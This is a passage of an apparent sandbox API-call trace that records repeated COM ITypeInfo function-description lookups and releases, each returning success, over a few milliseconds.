ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1e, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x20, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x21, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x22, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x23, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x24, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x25, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x26, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x27, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x28, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x29, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2a, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2b, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2c, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2d, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2e, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x30, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x31, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x32, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x33, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x34, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x35, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x36, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x37, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x38, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x39, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3a, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3c, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.333] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3d, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3e, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x40, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x41, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x42, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x43, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x44, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x45, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x46, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x47, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x48, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x49, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4a, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4c, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4d, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.334] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4e, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4f, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x50, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x51, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x52, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x53, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x54, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x55, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x56, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x57, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x58, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x59, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5a, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5c, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5d, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5e, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5f, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.335] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x60, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x61, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x62, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x63, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x64, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x65, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x66, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x67, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x68, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x69, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6a, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6c, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6d, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6e, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x70, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x71, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.336] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x72, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x73, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x74, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x75, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x76, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x77, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x78, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x79, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7a, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7c, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7d, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7e, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x80, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x81, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x82, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.337] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x83, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] 